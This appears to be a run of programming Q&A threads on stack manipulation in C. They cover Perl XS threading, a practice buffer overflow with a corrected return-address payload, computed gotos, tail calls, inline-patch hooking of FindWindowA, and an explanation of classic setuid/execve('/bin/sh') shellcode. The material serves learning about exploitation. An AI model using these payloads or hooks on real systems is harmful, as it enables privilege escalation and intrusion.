I have a Perl library written in C, and inside the XS file I declared a callback function to call Perl functions from C code. When I call this function from C code (multithreaded):
char *
callbackfunc(void *fun, char **args)
{
    dSP;
    int count,i;
    char *s;
    ENTER;
    SAVETMPS;
    PUSHMARK(SP);
    for(i=0;args[i];++i) {
        XPUSHs(sv_2mortal(newSVpv(args[i],0)));
    }
    PUTBACK;
    count = call_sv(fun,G_SCALAR|G_EVAL);
    SPAGAIN;
    s = NULL;
    if(count > 1)
        croak("callback may return only single value\n");
    if(count==1) {
        s = strdup(POPp);
    }
    PUTBACK;
    FREETMPS;
    LEAVE;
    return s;
}
I get a crash at the dSP macro:
#0 callbackfunc (fun=0x2416a58, args=0x7f3a0cfa9a10) at MyLibrary.xs:24
24 dSP;
In the disassembly it looks like some thread-specific data is not found:
push %r15
push %r14
mov %rdi,%r14
push %r13
mov %rsi,%r13
push %r12
push %rbp
push %rbx
sub $0x8,%rsp
mov 0x2015dd(%rip),%rbx
mov (%rbx),%edi
callq 0x7f3a0e37f550 <pthread_getspecific#plt>
mov (%rbx),%esi
mov (%rax),%r15 // here is crash because %rax is 0x0
You probably forgot to tell your thread about the current Perl interpreter. The perlembed man page says:
PERL_SET_CONTEXT(interp) should also be called whenever interp is used by a thread that did not create it (using either perl_alloc(), or the more esoteric perl_clone()).
Also note that calling Perl from C is not thread-safe. Make sure that proper locking is in place.
EDIT: If you didn't create the interpreter yourself, you can get a void * to the interpreter via the macro PERL_GET_CONTEXT. If you're only using a single interpreter, you could add some code to the XS boot section to store this value in a global. If you have multiple interpreters (or want to support fork on Windows), you have to track the current interpreter when registering your callback.
I am trying to learn more about buffer overflows so I have created a simple program to gain knowledge and try to exploit it.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void failed(void)
{
    puts("Did not exploit");
    exit(0);
}
void pass(void)
{
    puts("Good Job");
    exit(1);
}
void foo()
{
    char input[4];
    gets(input);
}
int _main()
{
    foo();
    failed();
    return 0;
}
I am trying to fill the buffer within foo() with random characters as well as the address of pass() such that the return address of foo() gets overwritten to the starting address of pass(). Using the GDB commands as follows to get relevant information.
x foo
-> 0x8049dd7 foo : 0xfb1e0ff3
disas foo
Dump of assembler code for function foo:
0x08049e09 <+0>: endbr32
0x08049e0d <+4>: push %ebp
0x08049e0e <+5>: mov %esp,%ebp
0x08049e10 <+7>: push %ebx
0x08049e11 <+8>: sub $0x14,%esp
0x08049e14 <+11>: call 0x8049e5a <__x86.get_pc_thunk.ax>
0x08049e19 <+16>: add $0x9b1e7,%eax
0x08049e1e <+21>: sub $0xc,%esp
0x08049e21 <+24>: lea -0xc(%ebp),%edx
0x08049e24 <+27>: push %edx
0x08049e25 <+28>: mov %eax,%ebx
0x08049e27 <+30>: call 0x8058850 <gets>
0x08049e2c <+35>: add $0x10,%esp
0x08049e2f <+38>: nop
0x08049e30 <+39>: mov -0x4(%ebp),%ebx
0x08049e33 <+42>: leave
0x08049e34 <+43>: ret
End of assembler dump.
I then created a Python program whose output is fed into my vulnerable.c program. It simply prints:
print('A'*15 + '\x08\x04\x9d\xd7')
The 'A'*15 is supposed to fill the buffer and the saved EBP, after which the address of foo (\x08\x04\x9d\xd7) overwrites the return address, but I keep getting segmentation faults. Any assistance would be great!
Any mistake and the attempt will segfault. You must:
have the right target address
put it in the right place on the stack
use the right byte order
The first one is difficult because the kernel will randomize address spaces on load,
primarily because of these kinds of attacks.
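The other two you've gotten wrong. In the disassembly the buffer starts at -0xc(%ebp), so it takes 12 bytes to reach the saved ebp and 4 more to cover it: the return address begins after 16 bytes, not 15. And because x86 is little-endian, the address bytes have to be written least significant byte first, i.e. \xd7\x9d\x04\x08 rather than \x08\x04\x9d\xd7.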
If you'd like to play with something similar, here's an example
that changes the return address. Because of C calling conventions,
the stack is corrupted at the end of main, which can be fixed by using
stdcall or pascal calling conventions for the test function.
Syntax for that is compiler dependent.
#include <stdio.h>
#include <stdlib.h>
void oops() {
    printf("oops!\n");
}
void /*__stdcall*/ test(int t)
{
    /* x86 stack is top down, int is same size as pointer */
    int *return_is_at = &t - 1;
    /* replace parameter with our return address, for oops to return to */
    *(&t) = *return_is_at; /* just-in-case avoid optimization*/
    /* replace our return address with address of oops */
    *return_is_at = (int)oops;
}
int main(int argc, char **argv)
{
    test(1);
    printf("test returned\n");
    /* unless stdcall, at this point our stack is corrupted
       and this return will crash, so:
    */
    exit(1);
}
Here's an alternative function that uses a local variable instead of the parameter
to calculate the return address location.
This assumes a standard stack frame, which the compiler may optimize away.
It also corrupts the stack.
void test2()
{
    /* x86 stack is top down, int is same size as pointer */
    /* this relies on consistently defined stack frames */
    int l;
    int *return_is_at = &l + 2;
    /* copy our return address up one,
       for oops to return to (corrupting the stack)
    */
    return_is_at[1] = *return_is_at;
    /* replace our return address with address of oops */
    *return_is_at = (int)oops;
}
FYI - It's possible to use a similar technique to track unique call trees for a function
(by walking up the stack frames) in order to fail specific call instances during testing.
So I was working on a project and was a little bored and thought about how to break C really hard:
Would it be possible to trick the compiler into using jumps (goto) for a function call? Maybe, I answered myself. After a bit of work I realised that some pointer stuff wasn't working correctly, but in an (at least for me) unexpected way: the goto wouldn't work as intended. After a little experimenting, I came up with this (comments removed, since I sometimes keep unused code in them when testing):
//author: me, The Array :)
#include <stdio.h>
void * func_return();
void (*break_ptr)(void) = (void *)func_return;
void * func_return(){
    printf("ok2\n");
    break_ptr = &&test2;
    return NULL;
    if(0 == 1){
        test2:
        printf("sh*t\n");
    }
}
void scoping(){
    printf("beginning of scoping\n");
    break_ptr();
    printf("after func call #1\n");
    break_ptr();
    printf("!!!YOU WILL NOT SEE THIS!!!!\n");
}
int main(){
    printf("beginning of programm\n");
    scoping();
    printf("ending programm\n");
}
I used gcc to compile this, as I don't know of any other compiler that supports the use of &&.
My platform is 64-bit Windows and I compiled it in the most basic way:
gcc.exe "however_you_want_to_call_it.c" -o "however_you_want_to_call_it.exe"
Looking over that code, I expected and wanted it to print "sh*t\n" to the console window (of course the \n will be invisible). But it turns out gcc is somewhat too smart for me? I guess that's what happens when you try to break something.
In fact, as the title says, it returns twice:
beginning of programm
beginning of scoping
ok2
after func call #1
ok2
ending programm
It does not return twice the way fork does, where the code that follows would presumably run twice. Rather, it returns out of the function AND out of the function that called it. So after the second call it does not print "!!!YOU WILL NOT SEE THIS!!!!\n" to the console, but rather "ending programm", as it returned twice. (I want to stress that "ending programm" is printed, i.e. the program does not crash.)
So the reason, why I posted that here, is the following: my questions..
Why does it not go to/ jump to/ call to the actual test2 label and instead goes to the beginning of that function?
How would I achieve the thing of my first question?
Why does it return twice? I figured it is probably a compiler thing instead of a runtime thing, but I guess I'll wait for someone's answer
Can the same thing (the returning twice) be achieved the first time the function "break_ptr" is called, instead of the second time?
I do not know and do not care if this also works in c++.
Now I can see many ways this can be useful, some malicious and some actually good. For example, you could code an enterprise function which returns your function. Enterprise solutions to problems tend to be weird, so why not make a function which returns your code, idk..
Yet it can be malicious, for example when some code returns unexpectedly or even without return values. I can imagine this existing in a DLL file with a header file that simply reads "extern void *break_ptr();" or something similar; I did not test it. (Yet there are way crueler ways to mess with someone..)
I could not find this documented anywhere on the internet. Please send me some links or references about this, if you find some, I want to learn more about it.
If this is "just" a bug and someone of the gnu/gcc guys is reading this: Please do NOT remove it, as it is too much fun working with these things.
Thank you in advance for your answers and your time and I am sorry for making this so long. I wanted to make sure everything collected about this is in one place. (Yet still I am sorry if I missed something..)
From the GCC documentation on Labels as Values:
You may not use this mechanism to jump to code in a different function. If you do that, totally unpredictable things happen.
The behavior you are seeing is documented. To really know what code the compiler generates, inspect the generated assembly.
The assembly from godbolt on gcc10.2 with no optimizations:
break_ptr:
.quad func_return
.LC0:
.string "ok2"
func_return:
push rbp
mov rbp, rsp
.L2:
mov edi, OFFSET FLAT:.LC0
call puts
mov eax, OFFSET FLAT:.L2
mov QWORD PTR break_ptr[rip], rax
mov eax, 0
pop rbp
ret
.LC1:
.string "beginning of scoping"
.LC2:
.string "after func call #1"
.LC3:
.string "!!!YOU WILL NOT SEE THIS!!!!"
scoping:
push rbp
mov rbp, rsp
mov edi, OFFSET FLAT:.LC1
call puts
mov rax, QWORD PTR break_ptr[rip]
call rax
mov edi, OFFSET FLAT:.LC2
call puts
mov rax, QWORD PTR break_ptr[rip]
call rax
mov edi, OFFSET FLAT:.LC3
call puts
nop
pop rbp
ret
.LC4:
.string "beginning of programm"
.LC5:
.string "ending programm"
main:
push rbp
mov rbp, rsp
mov edi, OFFSET FLAT:.LC4
call puts
mov eax, 0
call scoping
mov edi, OFFSET FLAT:.LC5
call puts
mov eax, 0
pop rbp
ret
This shows that the .L2 label was placed at the top of the function and that the if (0 == 1) { /* this */ } block was optimized out by the compiler. When you jump to .L2 you jump to the beginning of the function, except that the stack is set up incorrectly, because the push rbp is skipped.
Why does it not go to/ jump to/ call to the actual test2 label and instead goes to the beginning of that function?
Because the documentation says that if you jump to another function "totally unpredictable things happen"
How would I achieve the thing of my first question?
Hard to say, since "jumping into a function" is not really something you should do.
Why does it return twice? I figured it is probably a compiler thing instead of a runtime thing, but I guess I'll wait for someone's answer
Because returning twice is an element of the set of "unpredictable things"
Can the same thing (the returning twice) be achieved the first time the function "break_ptr" is called, instead of the second time?
See above. What you're doing will cause unpredictable things.
And just to point it out, your code has other flaws that may or may not be a part of this. func_return is a function taking an unspecified number of arguments and returning a void pointer. break_ptr is a pointer to a function taking NO arguments and returning void. The proper pointer would be
void * func_return();
void *(*break_ptr)() = func_return;
Notice three things. Apart from removing the cast, I removed void from the parentheses and added an asterisk. But a better alternative would be
void * func_return(void);
void *(*break_ptr)(void) = func_return;
The main thing here is, do NOT cast to silence the compiler. Fix the problem instead. Read more about casting here
Your cast invokes undefined behavior, which essentially is the same thing as "unpredictable things happen".
Also, you're missing a return statement in that function.
void * func_return(){
    printf("ok2\n");
    break_ptr = &&test2;
    return NULL;
    if(0 == 1){
        test2:
        printf("sh*t\n");
    }
    // What happens here?
}
Omitting the return statement can only safely be done in a function returning void but this function returns void*. Omitting it will cause undefined behavior which, again, means that unpredictable things happen.
My programming language compiles to C, I want to implement tail recursion optimization. The question here is how to pass control to another function without "returning" from the current function.
It is quite easy if the control is passed to the same function:
void f() {
__begin:
    /* do something here... */
    goto __begin; // "call" itself
}
As you can see there is no return value and no parameters; those are passed in a separate stack addressed by a global variable.
Another option is to use inline assembly:
#ifdef __clang__
#define tail_call(func_name) asm("jmp " func_name " + 8");
#else
#define tail_call(func_name) asm("jmp " func_name " + 4");
#endif
void f() {
__begin:
    /* do something here... */
    tail_call(f); // "call" itself
}
This is similar to goto, but where goto passes control to the first statement in the function, skipping the "entry code" generated by the compiler, jmp is different: its argument is a function pointer, so you need to add 4 or 8 bytes to skip the entry code.
Both approaches work, but only if the callee and the caller use the same amount of stack for local variables, which is allocated by the callee's entry code.
I was thinking to do leave manually with inline assembly, then replace the return address on the stack, then do a legal function call like f(). But my attempts all crashed. You need to modify BP and SP somehow.
So again, how to implement this for x64? (Again, assuming functions have no arguments and return void). A portable way without inline assembly is better, but assembly is accepted. Maybe longjmp can be used?
Maybe you can even push the callee address on the stack, replacing the original return address and just ret?
Do not try to do this yourself. A good C compiler can perform tail-call elimination in many cases and will do so. In contrast, a hack using inline assembly has a good chance of going wrong in a way that is difficult to debug.
For example, see this snippet on godbolt.org. To duplicate it here:
The C code I used was:
int foo(int n, int o)
{
    if (n == 0) return o;
    puts("***\n");
    return foo(n - 1, o + 1);
}
This compiles to:
.LC0:
.string "***\n"
foo:
test edi, edi
je .L4
push r12
mov r12d, edi
push rbp
mov ebp, esi
push rbx
mov ebx, edi
.L3:
mov edi, OFFSET FLAT:.LC0
call puts
sub ebx, 1
jne .L3
lea eax, [r12+rbp]
pop rbx
pop rbp
pop r12
ret
.L4:
mov eax, esi
ret
Notice that the tail call has been eliminated. The only call is to puts.
Since you don't need arguments and return values, how about combining all function into one and use labels instead of function names?
f:
__begin:
    ...
    CALL(h); // a macro implementing traditional call
    ...
    if (condition_ret)
        RETURN; // a macro implementing traditional return
    ...
    goto g; // tail recurse to g
The tricky part here is the RETURN and CALL macros. To return, you keep yet another stack, a stack of setjmp buffers: when you return you call longjmp(ret_stack.pop()), and when you call you do ret_stack.push(setjmp(f)). This is a loose rendition, of course; you'll need to fill in the details.
gcc can offer some optimization here with computed goto, which is more lightweight than longjmp. People who write VMs have similar problems, and seemingly have asm-based solutions for those even on MSVC, see example here.
Finally, even if such an approach saves memory, it may confuse the compiler and so cause performance anomalies. You are probably better off generating code for some portable assembler-like language, LLVM maybe? Not sure, but it should be something that has computed goto.
The venerable approach to this problem is to use trampolines. Essentially, every compiled function returns a function pointer (and maybe an arg count). The top level is a tight loop that, starting with your main, simply calls the returned function pointer ad infinitum. You could use a function that longjmps to escape the loop, i.e., to terminate the program.
See this SO Q&A. Or Google "recursion tco trampoline."
For another approach, see Cheney on the MTA, where the stack just grows until it's full, which triggers a GC. This works once the program is converted to continuation passing style (CPS) since in that style, functions never return; so, after the GC, the stack is all garbage, and can be reused.
I will suggest a hack. The x86 call instruction, which is used by the compiler to translate your function calls, pushes the return address on the stack and then performs a jump.
What you can do is a bit of a stack manipulation, using some inline assembly and possibly some macros to save yourself a bit of headache. You basically have to overwrite the return address on the stack, which you can do immediately in the function called. You can have a wrapper function which overwrites the return address and calls your function - the control flow will then return to the wrapper which then moves to wherever you pointed it to.
I'm trying to hook the Windows API function FindWindowA(). I successfully did it with the code below without "hotpatching" it: I've overwritten the bytes at the beginning of the function. myHook() is called and a message box shows up when FindWindowA() is called.
user32.dll has hotpatching enabled and I'd like to overwrite the NOPs before the actual function instead of overwriting the function itself. However, the code below won't work when I set hotpatching to TRUE. It does nothing when FindWindowA() gets executed.
#include <stdio.h>
#include <windows.h>
void myHook()
{
MessageBoxA(NULL, "Hooked", "Hook", MB_ICONINFORMATION);
}
int main(int argc, char *argv[])
{
BOOLEAN hotpatching = FALSE;
LPVOID fwAddress = GetProcAddress(GetModuleHandleA("user32.dll"), "FindWindowA");
LPVOID fwHotpatchingAddress = (LPVOID)((DWORD)fwAddress - 5);
LPVOID myHookAddress = &myHook;
DWORD jmpOffset = (DWORD)&myHook - (DWORD)(!hotpatching ? fwAddress : fwHotpatchingAddress) - 5; // -5 because "JMP offset" = 5 bytes (1 + 4)
printf("fwAddress: %X\n", fwAddress);
printf("fwHotpatchingAddress: %X\n", fwHotpatchingAddress);
printf("myHookAddress: %X\n", myHookAddress);
printf("jmpOffset: %X\n", jmpOffset);
printf("Ready?\n\n");
getchar();
char JMP[1] = {0xE9};
char RETN[1] = {0xC3};
LPVOID offset0 = NULL;
LPVOID offset1 = NULL;
LPVOID offset2 = NULL;
if (!hotpatching)
offset0 = fwAddress;
else
offset0 = fwHotpatchingAddress;
offset1 = (LPVOID)((DWORD)offset0 + 1);
offset2 = (LPVOID)((DWORD)offset1 + 4);
DWORD oldProtect = 0;
VirtualProtect(offset0, 6, PAGE_EXECUTE_READWRITE, &oldProtect);
memcpy(fwAddress, JMP, 1);
memcpy(offset1, &jmpOffset, 4);
memcpy(offset2, RETN, 1);
VirtualProtect(offset0, 6, oldProtect, &oldProtect);
printf("FindWindowA() Patched");
getchar();
FindWindowA(NULL, "Test");
getchar();
return 0;
}
Could you tell me what's wrong?
Thank you.
Hotpatching enabled executable images are prepared by the compiler and linker to allow replacing the image while in use. The following two changes are applied (x86):
The function entry point is set to a 2-byte no-op mov edi, edi (/hotpatch).
Five consecutive nop's are prepended to each function entry point (/FUNCTIONPADMIN).
To illustrate this, here is a typical disassembly listing of a hotpatching enabled function:
(2) 768C8D66 90 nop
768C8D67 90 nop
768C8D68 90 nop
768C8D69 90 nop
768C8D6A 90 nop
(1) 768C8D6B 8B FF mov edi,edi
(3) 768C8D6D 55 push ebp
768C8D6E 8B EC mov ebp,esp
(1) designates the function entry point with the 2-byte no-op. (2) is the padding provided by the linker, and (3) is where the non-trivial function implementation starts.
To hook into a function you have to overwrite (2) with a jump to your hook function jmp myHook, and make this code reachable by replacing (1) with a relative jump jmp $-5.
The hook function must leave the stack in a consistent state. It should be declared as __declspec(naked) to prevent the compiler from generating function prolog and epilog code. The final instruction must either perform stack cleanup in line with the calling convention of the hooked function, or jump back to the hooked function at the address designated by (3).
WARNING: This is an exploit. Do not execute this code.
//shellcode.c
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main() {
    int *ret;                 //ret pointer for manipulating saved return.
    ret = (int *)&ret + 2;    //set ret to point to the saved return
                              //value on the stack.
    (*ret) = (int)shellcode;  //change the saved return value to the
                              //address of the shellcode, so it executes.
}
Can anyone give me a better explanation?
Apparently, this code attempts to change the stack so that when the main function returns, program execution does not return regularly into the runtime library (which would normally terminate the program), but would jump instead into the code saved in the shellcode array.
1) int *ret;
defines a variable on the stack, just beneath the main function's arguments.
2) ret = (int *)&ret + 2;
lets the ret variable point to a int * that is placed two ints above ret on the stack. Supposedly that's where the return address is located where the program will continue when main returns.
3) (*ret) = (int)shellcode;
The return address is set to the address of the shellcode array's contents, so that shellcode's contents will be executed when main returns.
shellcode seemingly contains machine instructions that possibly do a system call to launch /bin/sh. I could be wrong on this as I didn't actually disassemble shellcode.
P.S.: This code is machine- and compiler-dependent and will possibly not work on all platforms.
Reply to your second question:
and what happens if I use
ret=(int)&ret +2 and why did we add 2?
why not 3 or 4??? and I think that int
is 4 bytes so 2 will be 8bytes no?
ret is declared as an int*, therefore assigning an int (such as (int)&ret) to it would be an error. As to why 2 is added and not any other number: apparently because this code assumes that the return address will lie at that location on the stack. Consider the following:
This code assumes that the call stack grows downward when something is pushed on it (as it indeed does e.g. with Intel processors). That is the reason why a number is added and not subtracted: the return address lies at a higher memory address than automatic (local) variables (such as ret).
From what I remember from my Intel assembly days, a C function is often called like this: First, all arguments are pushed onto the stack in reverse order (right to left). Then, the function is called. The return address is thus pushed on the stack. Then, a new stack frame is set up, which includes pushing the ebp register onto the stack. Then, local variables are set up on the stack beneath all that has been pushed onto it up to this point.
Now I assume the following stack layout for your program:
+-------------------------+
| function arguments | |
| (e.g. argv, argc) | | (note: the stack
+-------------------------+ <-- ss:esp + 12 | grows downward!)
| return address | |
+-------------------------+ <-- ss:esp + 8 V
| saved ebp register |
+-------------------------+ <-- ss:esp + 4 / ss:ebp - 0 (see code below)
| local variable (ret) |
+-------------------------+ <-- ss:esp + 0 / ss:ebp - 4
At the bottom lies ret (which is a 32-bit integer). Above it is the saved ebp register (which is also 32 bits wide). Above that is the 32-bit return address. (Above that would be main's arguments -- argc and argv -- but these aren't important here.) When the function executes, the stack pointer points at ret. The return address lies 64 bits "above" ret, which corresponds to the + 2 in
ret = (int*)&ret + 2;
It is + 2 because ret is a int*, and an int is 32 bit, therefore adding 2 means setting it to a memory location 2 × 32 bits (=64 bits) above (int*)&ret... which would be the return address' location, if all the assumptions in the above paragraph are correct.
Excursion: Let me demonstrate in Intel assembly language how a C function might be called (if I remember correctly -- I'm no guru on this topic so I might be wrong):
// first, push all function arguments on the stack in reverse order:
push argv
push argc
// then, call the function; this will push the current execution address
// on the stack so that a return instruction can get back here:
call main
// (afterwards: clean up stack by removing the function arguments, e.g.:)
add esp, 8
Inside main, the following might happen:
// create a new stack frame and make room for local variables:
push ebp
mov ebp, esp
sub esp, 4
// access return address:
mov edi, ss:[ebp+4]
// access argument 'argc'
mov eax, ss:[ebp+8]
// access argument 'argv'
mov ebx, ss:[ebp+12]
// access local variable 'ret'
mov edx, ss:[ebp-4]
...
// restore stack frame and return to caller (by popping the return address)
mov esp, ebp
pop ebp
ret
See also: Description of the procedure call sequence in C for another explanation of this topic.
The actual shellcode is:
(gdb) x /25i &shellcode
0x804a040 <shellcode>: xor %eax,%eax
0x804a042 <shellcode+2>: xor %ebx,%ebx
0x804a044 <shellcode+4>: mov $0x17,%al
0x804a046 <shellcode+6>: int $0x80
0x804a048 <shellcode+8>: jmp 0x804a069 <shellcode+41>
0x804a04a <shellcode+10>: pop %esi
0x804a04b <shellcode+11>: mov %esi,0x8(%esi)
0x804a04e <shellcode+14>: xor %eax,%eax
0x804a050 <shellcode+16>: mov %al,0x7(%esi)
0x804a053 <shellcode+19>: mov %eax,0xc(%esi)
0x804a056 <shellcode+22>: mov $0xb,%al
0x804a058 <shellcode+24>: mov %esi,%ebx
0x804a05a <shellcode+26>: lea 0x8(%esi),%ecx
0x804a05d <shellcode+29>: lea 0xc(%esi),%edx
0x804a060 <shellcode+32>: int $0x80
0x804a062 <shellcode+34>: xor %ebx,%ebx
0x804a064 <shellcode+36>: mov %ebx,%eax
0x804a066 <shellcode+38>: inc %eax
0x804a067 <shellcode+39>: int $0x80
0x804a069 <shellcode+41>: call 0x804a04a <shellcode+10>
0x804a06e <shellcode+46>: das
0x804a06f <shellcode+47>: bound %ebp,0x6e(%ecx)
0x804a072 <shellcode+50>: das
0x804a073 <shellcode+51>: jae 0x804a0dd
0x804a075 <shellcode+53>: add %al,(%eax)
This corresponds to roughly
setuid(0);
x[0] = "/bin/sh"
x[1] = 0;
execve("/bin/sh", &x[0], &x[1])
exit(0);
That string is from an old document on buffer overflows, and will execute /bin/sh. Since it's malicious code (well, when paired with a buffer exploit), you should really include its origin next time.
From that same document, how to code stack based exploits :
/* the shellcode is hex for: */
#include <stdio.h>
main() {
char *name[2];
name[0] = "sh";
name[1] = NULL;
execve("/bin/sh",name,NULL);
}
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0
\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c
\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
The code you included causes the contents of shellcode[] to be executed, running execve, and providing access to the shell. And the term Shellcode? From Wikipedia :
In computer security, a shellcode is a
small piece of code used as the
payload in the exploitation of a
software vulnerability. It is called
"shellcode" because it typically
starts a command shell from which the
attacker can control the compromised
machine. Shellcode is commonly written
in machine code, but any piece of code
that performs a similar task can be
called shellcode.
Without looking up all the actual opcodes to confirm, the shellcode array contains the machine code necessary to exec /bin/sh. This shellcode is machine code carefully constructed to perform the desired operation on a specific target platform and not to contain any null bytes.
The code in main() is changing the return address and the flow of execution in order to cause the program to spawn a shell by having the instructions in the shellcode array executed.
See Smashing The Stack For Fun And Profit for a description on how shellcode such as this can be created and how it might be used.
The string contains a series of bytes represented in hexadecimal.
The bytes encode a series of instructions for a particular processor on a particular platform — hopefully, yours. (Edit: if it's malware, hopefully not yours!)
The variable is defined just to get a handle to the stack. A bookmark, if you will. Then pointer arithmetic is used, again platform-dependent, to manipulate the state of the program to cause the processor to jump to and execute the bytes in the string.
Each \xXX is a hexadecimal number. One, two or three of such numbers together form an op-code (google for it). Together it forms assembly which can be executed by the machine more or less directly. And this code tries to execute the shellcode.
I think the shellcode tries to spawn a shell.
This just spawns /bin/sh; in C it would be something like execve("/bin/sh", NULL, NULL);